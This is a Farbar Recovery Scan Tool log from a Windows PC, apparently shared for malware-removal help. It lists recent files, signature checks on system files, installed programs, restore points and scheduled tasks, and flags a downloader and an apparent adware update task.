2014-08-07 15:28 - 2014-08-07 15:28 - 00002503 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Safari.lnk
2014-08-07 15:28 - 2014-08-07 15:28 - 00002491 _____ () C:\Users\Public\Desktop\Safari.lnk
2014-08-07 15:28 - 2014-08-07 15:27 - 00000000 ____D () C:\Program Files (x86)\Safari
2014-08-07 15:28 - 2013-12-17 14:51 - 00000000 ____D () C:\Users\administrator\AppData\Roaming\Apple Computer
2014-08-07 15:27 - 2014-08-07 15:27 - 00000000 ____D () C:\ProgramData\Apple Computer
2014-08-07 15:26 - 2014-08-07 15:26 - 38494576 _____ (Apple Inc.) C:\Users\administrator\Downloads\SafariSetup.exe
2014-08-07 15:24 - 2014-08-07 15:24 - 00762096 _____ () C:\Users\administrator\Downloads\safari setup.exe
2014-08-07 15:23 - 2014-08-07 15:23 - 00001159 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
2014-08-07 15:23 - 2014-08-07 15:23 - 00001147 _____ () C:\Users\Public\Desktop\Mozilla Firefox.lnk
2014-08-07 15:22 - 2014-08-07 15:22 - 00244120 _____ () C:\Users\administrator\Downloads\Firefox Setup Stub 31.0.exe
2014-08-07 15:22 - 2014-08-07 15:22 - 00244120 _____ () C:\Users\administrator\Downloads\Firefox Setup Stub 31.0 (1).exe
2014-08-07 14:06 - 2014-08-07 14:06 - 00000000 ____D () C:\Users\administrator\Documents\VAL HEALTH RECORDS
2014-08-06 19:06 - 2014-08-15 02:46 - 00529920 _____ (Microsoft Corporation) C:\Windows\system32\aepdu.dll
2014-08-06 19:01 - 2014-08-15 02:46 - 00424448 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2014-08-06 12:42 - 2014-08-06 12:24 - 00000000 ____D () C:\Program Files\Earth Networks
2014-08-06 12:25 - 2014-08-06 12:25 - 00000000 ____D () C:\Users\administrator\Downloads\Driver Support
2014-08-06 12:24 - 2014-08-06 12:24 - 00000264 _____ () C:\Users\administrator\Desktop\Cut the Rope.url
2014-08-06 12:24 - 2014-08-06 12:24 - 00000000 ____D () C:\Users\administrator\AppData\Local\IsolatedStorage
2014-08-06 12:24 - 2014-08-06 12:24 - 00000000 ____D () C:\ProgramData\Driver Support
2014-08-06 12:23 - 2014-08-06 12:23 - 01057176 _____ (Adobe) C:\Users\administrator\Downloads\adobe_flashplayer.exe
2014-08-06 12:23 - 2014-08-06 12:23 - 00749840 _____ ( ) C:\Users\administrator\Downloads\adobe_flash_setup.exe
2014-08-05 09:20 - 2010-11-20 20:27 - 00270496 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe

Files to move or delete:
====================
C:\Users\administrator\g2ax_customer_downloadhelper_win32_x86.exe


==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed


LastRegBack: 2014-08-27 00:53

==================== End Of Log ============================

 

 

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 03-09-2014 02
Ran by Administrator at 2014-09-03 12:12:23
Running from C:\Users\administrator\Desktop
Boot Mode: Normal
==========================================================


==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: avast! Antivirus (Enabled - Up to date) {2B2D1395-420B-D5C9-657E-930FE358FC3C}
AS: avast! Antivirus (Enabled - Up to date) {904CF271-6431-DA47-5FCE-A87D98DFB681}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Acrobat.com (x32 Version: 0.0.0 - Adobe Systems Incorporated) Hidden
Adobe Flash Player 14 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 14.0.0.145 - Adobe Systems Incorporated)
Adobe Flash Player 14 Plugin (HKLM-x32\...\Adobe Flash Player Plugin) (Version: 14.0.0.145 - Adobe Systems Incorporated)
Adobe Reader XI (11.0.08) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.08 - Adobe Systems Incorporated)
Advanced Scan to PDF Free 4.0.1 (HKLM-x32\...\Advanced Scan to PDF Free_is1) (Version:  - PDFChief Co., Ltd.)
Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
ArcSoft MediaConverter 8 (HKLM-x32\...\{2CAD3C16-ACD0-43E5-81DA-7E56C3E5336C}) (Version: 8.0.0.21 - ArcSoft)
avast! Free Antivirus (HKLM-x32\...\avast) (Version: 8.0.1497.0 - AVAST Software)
Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
Citrix Online Launcher (HKLM-x32\...\{F17C3DC2-2ACA-4B0E-BDBF-ACE61B14E7CD}) (Version: 1.0.183 - Citrix)
Combined Community Codec Pack 2013-08-01 (HKLM-x32\...\Combined Community Codec Pack_is1) (Version: 2013.08.01.0 - CCCP Project)
Corel PaintShop Pro X6 (HKLM-x32\...\_{166D1CB6-DD8A-40DD-9E25-4D31D2D6DE4D}) (Version: 16.2.0.20 - Corel Corporation)
Corel PaintShop Pro X6 (x32 Version: 16.2.0.20 - Corel Corporation) Hidden
CutePDF Writer 3.0 (HKLM\...\CutePDF Writer Installation) (Version:  3.0 - CutePDF.com)
Definition Update for Microsoft Office 2010 (KB982726) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{132D27B8-C656-44BD-8C16-73C54EA8A85F}) (Version:  - Microsoft)
Doxillion Document Converter (HKLM-x32\...\Doxillion) (Version: 2.17 - NCH Software)
Express Accounts (HKLM-x32\...\ExpressAccounts) (Version: 4.82 - NCH Software)
FUJITSU Scanner USB HotFix (HKLM-x32\...\{F7FFF37F-DB74-408C-840F-BD8B8E955B5B}) (Version: 1.00.0000 - PFU)
Google Chrome (HKLM-x32\...\{84EE38CA-199D-3BCC-8649-3464469BB54C}) (Version: 65.130.49228 - Google, Inc.)
Google Update Helper (x32 Version: 1.3.24.15 - Google Inc.) Hidden
ICA (x32 Version: 16.0.0.113 - Corel Corporation) Hidden
iCloud (HKLM\...\{81E20D41-C277-4526-934D-F2380AF91B78}) (Version: 3.1.0.40 - Apple Inc.)
IDrive Version - 6.0 (HKLM-x32\...\IDrive Windows_is1) (Version: 6.0 - Pro Softnet Corp)
Intel® Control Center (HKLM-x32\...\{F8A9085D-4C7A-41a9-8A77-C8998A96C421}) (Version: 1.2.1.1008 - Intel Corporation)
Intel® Manageability Engine Firmware Recovery Agent (HKLM-x32\...\{A6C48A9F-694A-4234-B3AA-62590B668927}) (Version: 1.0.0.36354 - Intel Corporation)
Intel® Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 8.1.0.1281 - Intel Corporation)
Intel® Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 9.17.10.2857 - Intel Corporation)
Intel® Rapid Storage Technology (HKLM-x32\...\{3E29EE6C-963A-4aae-86C1-DC237C4A49FC}) (Version: 11.6.0.1030 - Intel Corporation)
Intel® SDK for OpenCL - CPU Only Runtime Package (HKLM-x32\...\{FCB3772C-B7D0-4933-B1A9-3707EBACC573}) (Version: 2.0.0.37149 - Intel Corporation)
Intel® Smart Connect Technology 2.0 x64 (HKLM\...\{D1B033E8-A077-4B0D-9831-5798E19E861E}) (Version: 2.0.1083.0 - Intel)
Intel® USB 3.0 eXtensible Host Controller Driver (HKLM-x32\...\{240C3DDD-C5E9-4029-9DF7-95650D040CF2}) (Version: 1.0.5.235 - Intel Corporation)
Intel® Trusted Connect Service Client (Version: 1.24.738.1 - Intel Corporation) Hidden
IntelliScanner Software (HKLM-x32\...\IntelliScanner Software_is1) (Version:  - )
Inventoria Stock Manager (HKLM-x32\...\Inventoria) (Version: 3.45 - NCH Software)
IPM_PSP_COM (x32 Version: 16.0.0.113 - Corel Corporation) Hidden
IPM_PSP_COM64 (Version: 16.0.0.113 - Corel Corporation) Hidden
Java 7 Update 40 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F86417040FF}) (Version: 7.0.400 - Oracle)
Java 7 Update 51 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83217040FF}) (Version: 7.0.510 - Oracle)
Java Auto Updater (x32 Version: 2.1.9.8 - Sun Microsystems, Inc.) Hidden
K-Lite Codec Pack 10.0.5 Full (HKLM-x32\...\KLiteCodecPack_is1) (Version: 10.0.5 - )
Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft .NET Framework 4.5.1 (Version: 4.5.50938 - Microsoft Corporation) Hidden
Microsoft Office Access MUI (English) 2010 (x32 Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Access Setup Metadata MUI (English) 2010 (x32 Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Excel MUI (English) 2010 (x32 Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Office 64-bit Components 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office OneNote MUI (English) 2010 (x32 Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Outlook MUI (English) 2010 (x32 Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office PowerPoint MUI (English) 2010 (x32 Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Professional 2010 (HKLM-x32\...\Office14.SingleImage) (Version: 14.0.7015.1000 - Microsoft Corporation)
Microsoft Office Proof (English) 2010 (x32 Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (French) 2010 (x32 Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (Spanish) 2010 (x32 Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Proofing (English) 2010 (x32 Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Publisher MUI (English) 2010 (x32 Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared 64-bit MUI (English) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared 64-bit Setup Metadata MUI (English) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared MUI (English) 2010 (x32 Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared Setup Metadata MUI (English) 2010 (x32 Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Single Image 2010 (x32 Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Word MUI (English) 2010 (x32 Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.30514.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.21022 (HKLM\...\{350AA351-21FA-3270-8B7A-835434E766AD}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Mozilla Firefox 31.0 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 31.0 (x86 en-US)) (Version: 31.0 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 31.0 - Mozilla)
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
Pixillion Image Converter (HKLM-x32\...\Pixillion) (Version: 2.72 - NCH Software)
PSPPContent (x32 Version: 16.0.0.113 - Corel Corporation) Hidden
PSPPHelp (x32 Version: 16.0.0.113 - Corel Corporation) Hidden
PSPPro64 (Version: 16.2.0.20 - Corel Corporation) Hidden
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 7.48.823.2011 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6772 - Realtek Semiconductor Corp.)
RetailEdge 8.2 (HKLM-x32\...\{AC0224E5-0DE1-423D-A5EB-69FB8816A52F}_is1) (Version:  - High Meadow Business Solutions)
Safari (HKLM-x32\...\{C779648B-410E-4BBA-B75B-5815BCEFE71D}) (Version: 5.34.57.2 - Apple Inc.)
SAMSUNG USB Driver for Mobile Phones (HKLM\...\{D0795B21-0CDA-4a92-AB9E-6E92D8111E44}) (Version: 1.5.24.999 - SAMSUNG Electronics Co., Ltd.)
Scanner Utility for Microsoft Windows V09L21 (HKLM-x32\...\{580E9BBC-A51E-4AE9-A977-7B0939BEDAD3}) (Version: 9.11.2.0 - FUJITSU)
Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{DE28B448-32E8-4E8F-84F0-A52B21A49B5B}) (Version:  - Microsoft)
Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition (x32 Version:  - Microsoft) Hidden
Setup (x32 Version: 16.0.0.113 - Corel Corporation) Hidden
Software Operation Panel (HKLM-x32\...\Software Operation Panel) (Version:  - )
SUABnR (HKLM-x32\...\InstallShield_{2485354C-6B65-4978-BB91-CCE61442377B}) (Version: 1.1.0.13103_1 - Samsung Electronics Co., Ltd.)
SUABnR (x32 Version: 1.1.0.13103_1 - Samsung Electronics Co., Ltd.) Hidden
TSPrint Client (HKLM-x32\...\{11E91AF3-0B2A-4FE5-9D2F-CC3EDF2C0EBE}_is1) (Version: 1.9.9.7 - TerminalWorks, Inc.)
TSScan Client (HKLM-x32\...\{11E91AF3-0B2A-4FE5-9D2F-CC3EDF2C8743}_is1) (Version: 2.8.8.6 - TerminalWorks)
Unity Web Player (HKCU\...\UnityWebPlayer) (Version:  - Unity Technologies ApS)
Update for Microsoft Access 2010 (KB2553446) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{B4A38370-2ADB-46B0-A1B0-0C4A2F7DCA31}) (Version:  - Microsoft)
Update for Microsoft Excel 2010 (KB2837600) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{4ACD847E-547D-493F-9A86-F73EAE1B5174}) (Version:  - Microsoft)
Update for Microsoft Filter Pack 2.0 (KB2878281) 32-Bit Edition (HKLM-x32\...\{90140000-002A-0000-1000-0000000FF1CE}_Office14.SingleImage_{302A8FE3-EBF5-486C-A431-16A1CD914443}) (Version:  - Microsoft)
Update for Microsoft Filter Pack 2.0 (KB2878281) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{302A8FE3-EBF5-486C-A431-16A1CD914443}) (Version:  - Microsoft)
Update for Microsoft InfoPath 2010 (KB2817369) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{4EEA3D3E-989C-4DF4-AB0A-3042C0C12AA3}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2589298) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{DADF7E25-FFA4-4D02-BE84-1DAE62C18516}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2589352) 32-Bit Edition (HKLM-x32\...\{90140000-002A-0000-1000-0000000FF1CE}_Office14.SingleImage_{F4284D93-7AE8-4309-8CF3-9AD394F35F3A}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2589352) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{F4284D93-7AE8-4309-8CF3-9AD394F35F3A}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2589375) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{287A1E92-9E41-4BC1-8920-B3D0E9220800}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2597087) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{9D69691D-823D-4C3E-9B12-563A3F520366}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2687502) 32-Bit Edition (HKLM-x32\...\{90140000-001F-0409-0000-0000000FF1CE}_Office14.SingleImage_{7DE7DF97-82FE-4B3A-AB8D-1621F9CC464A}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2760598) 32-Bit Edition (HKLM-x32\...\{90140000-002A-0000-1000-0000000FF1CE}_Office14.SingleImage_{ECFE33A3-B8B7-439A-ADE4-59FBD29EF9B8}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2760598) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{ECFE33A3-B8B7-439A-ADE4-59FBD29EF9B8}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2760631) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{35698CB7-AAA2-4577-B505-DBFF504AEF23}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2794737) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{5AA578BB-759C-40FD-9661-A737C0884541}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2825635) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{F1A20C69-9FE5-40FD-9CD5-84EABC2EF64A}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2837581) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{334FB202-28D7-4BA4-8BC9-4FE4AB233EA0}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2837606) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{B0D672F7-883E-4279-8E75-D97A5445AB46}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2878252) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{B0DB9F71-E0F7-4FE6-8925-35B860CAC0C4}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2881028) 32-Bit Edition (HKLM-x32\...\{90140000-001F-040C-0000-0000000FF1CE}_Office14.SingleImage_{089DBFD7-8211-43B2-AAAE-5BDD8C23E3A8}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2881028) 32-Bit Edition (HKLM-x32\...\{90140000-001F-0C0A-0000-0000000FF1CE}_Office14.SingleImage_{794A0574-4E2F-4D58-B2A0-D7460ACDC85C}) (Version:  - Microsoft)
Update for Microsoft OneNote 2010 (KB2837595) 32-Bit Edition (HKLM-x32\...\{90140000-002A-0000-1000-0000000FF1CE}_Office14.SingleImage_{51CCA922-A0CC-47C4-8910-6936D97CAC2E}) (Version:  - Microsoft)
Update for Microsoft OneNote 2010 (KB2837595) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{51CCA922-A0CC-47C4-8910-6936D97CAC2E}) (Version:  - Microsoft)
Update for Microsoft Outlook 2010 (KB2687567) 32-Bit Edition (HKLM-x32\...\{90140000-001A-0409-0000-0000000FF1CE}_Office14.SingleImage_{DCE104A1-1875-4469-A83D-A5BFA6C4640F}) (Version:  - Microsoft)
Update for Microsoft Outlook 2010 (KB2687567) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{2AB483F1-C86E-427A-83B4-23889B03512D}) (Version:  - Microsoft)
Update for Microsoft PowerPoint 2010 (KB2837579) 32-Bit Edition (HKLM-x32\...\{90140000-0018-0409-0000-0000000FF1CE}_Office14.SingleImage_{334AA0A1-2BB1-4D74-B66A-2B2C4D9C2C87}) (Version:  - Microsoft)
Update for Microsoft PowerPoint 2010 (KB2837579) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{2BA40F82-F3A4-441C-BF1A-ED4C42FF4872}) (Version:  - Microsoft)
Update for Microsoft SharePoint Workspace 2010 (KB2760601) 32-Bit Edition (HKLM-x32\...\{90140000-002A-0000-1000-0000000FF1CE}_Office14.SingleImage_{F9F5A080-AF38-4966-9A6B-C43DCA465035}) (Version:  - Microsoft)
Update for Microsoft Visio 2010 (KB2880526) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{7B29D8B8-6A87-496C-A65E-B935E740448A}) (Version:  - Microsoft)
Update for Microsoft Visio Viewer 2010 (KB2837587) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{38CF30E4-3348-4BD1-A859-B630C355A56F}) (Version:  - Microsoft)
Update for Microsoft Word 2010 (KB2880529) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{B9B89E01-5B6B-4F73-BC34-B2C0D8ACB4CD}) (Version:  - Microsoft)
Verizon Wireless Software Upgrade Assistant - Samsung(ar) (HKLM-x32\...\{A3070098-A41D-42D9-B6D3-2EF15285E719}) (Version: 2.14.0605 - Samsung Electronics Co., Ltd.)
Verizon Wireless Software Utility Application for Android - Samsung (HKLM-x32\...\{69258FD1-F4EE-475A-83D1-BF68C8029592}) (Version: 2.14.0402 - Samsung Electronics Co., Ltd.)
VLC media player 2.1.0 (HKLM-x32\...\VLC media player) (Version: 2.1.0 - VideoLAN)
WinRAR 5.00 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.00.0 - win.rar GmbH)
WordPerfect Office X4 - Common (x32 Version: 14.0 - Corel Corporation) Hidden
WordPerfect Office X4 - Content (x32 Version: 14.0 - Corel Corporation) Hidden
WordPerfect Office X4 - EN (x32 Version: 14.0 - Corel Corporation) Hidden
WordPerfect Office X4 - Filters (x32 Version: 14.0 - Corel Corporation) Hidden
WordPerfect Office X4 - Graphics (x32 Version: 14.0 - Corel Corporation) Hidden
WordPerfect Office X4 - ICA (x32 Version: 14.0 - Corel Corporation) Hidden
WordPerfect Office X4 - IPM (x32 Version: 14.0 - Corel Corporation) Hidden
WordPerfect Office X4 - IPM T EN (x32 Version: 14.0 - Corel Corporation) Hidden
WordPerfect Office X4 - MAIL (x32 Version: 14.0 - Corel Corporation) Hidden
WordPerfect Office X4 - Migration Manager (x32 Version: 14.0 - Corel Corporation) Hidden
WordPerfect Office X4 - PerfectExperts (x32 Version: 14.0 - Corel Corporation) Hidden
WordPerfect Office X4 - PR (x32 Version: 14.0 - Corel Corporation) Hidden
WordPerfect Office X4 - QP (x32 Version: 14.0 - Corel Corporation) Hidden
WordPerfect Office X4 - Skins (x32 Version: 14.0 - Corel Corporation) Hidden
WordPerfect Office X4 - System (x32 Version: 14.0 - Corel Corporation) Hidden
WordPerfect Office X4 - WP (x32 Version: 14.0 - Corel Corporation) Hidden
WordPerfect Office X4 (HKLM-x32\...\_{DCDAB2ED-5741-4C30-A1A4-0FCB8A529001}) (Version:  - Corel Corporation)
WordPerfect Office X4 (x32 Version: 14.0 - Corel Corporation) Hidden

==================== Custom CLSID (selected items): ==========================

(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)


==================== Restore Points  =========================

13-08-2014 10:00:14 Windows Update
15-08-2014 10:00:12 Windows Update
19-08-2014 09:23:57 Windows Update
26-08-2014 09:23:53 Windows Update
27-08-2014 00:53:56 Windows Update
28-08-2014 10:00:10 Windows Update
02-09-2014 11:57:26 Windows Update
03-09-2014 18:55:38 OTL Restore Point - 9/3/2014 11:55:34 AM

==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-13 19:34 - 2009-06-10 14:00 - 00000824 ____A C:\Windows\system32\Drivers\etc\hosts

==================== Scheduled Tasks (whitelisted) =============

(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)

Task: {14E49956-1419-4033-BE55-5ED501812083} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2014-07-09] (Adobe Systems Incorporated)
Task: {2AC63040-25C4-4CE3-A8B6-2719945A4BA0} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.)
Task: {2B8321BC-DDD4-428E-8EB4-F6E358FFAC4D} - System32\Tasks\NCH Software\InventoriaSchedBackup => C:\Program Files (x86)\NCH Software\Inventoria\Inventoria.exe
Task: {38297F1A-928E-457D-8279-7B42AFE97D08} - System32\Tasks\ISM-UpdateService-4e00205a-2ab1-4423-8f77-cc25b82cde1d => C:\Program Files (x86)\Intel\Intel® ME FW Recovery Agent\bin\Bootstrap.exe [2012-04-16] (Intel Corporation)
Task: {5F3BDA79-D2C3-4680-A51C-B465197364BB} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2013-09-25] (Google Inc.)
Task: {614CE5A2-CD9A-4BFE-AF6A-F1E2FEF28C11} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2013-09-25] (Google Inc.)
Task: {6B47C339-E212-43E7-8883-CE0F6E529377} - System32\Tasks\ISM-UpdateService-4e00205a-2ab1-4423-8f77-cc25b82cde1d-Logon => C:\Program Files (x86)\Intel\Intel® ME FW Recovery Agent\bin\Bootstrap.exe [2012-04-16] (Intel Corporation)
Task: {7D8EEDAB-3344-4350-8EB9-3976F6A345F1} - System32\Tasks\avast! Emergency Update => C:\Program Files\AVAST Software\Avast\AvastEmUpdate.exe [2013-08-30] (AVAST Software)
Task: {E0D76832-9A8E-4050-946F-74D7E16885E6} - System32\Tasks\0814tbUpdateInfo => C:\ProgramData\Avg_Update_0814tb\0814tb_{342B3307-7554-4042-A579-C6C19C5A9B46}.exe
Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\ISM-UpdateService-4e00205a-2ab1-4423-8f77-cc25b82cde1d-Logon.job => C:\Program Files (x86)\Intel\Intel® ME FW Recovery Agent\bin\Bootstrap.exe
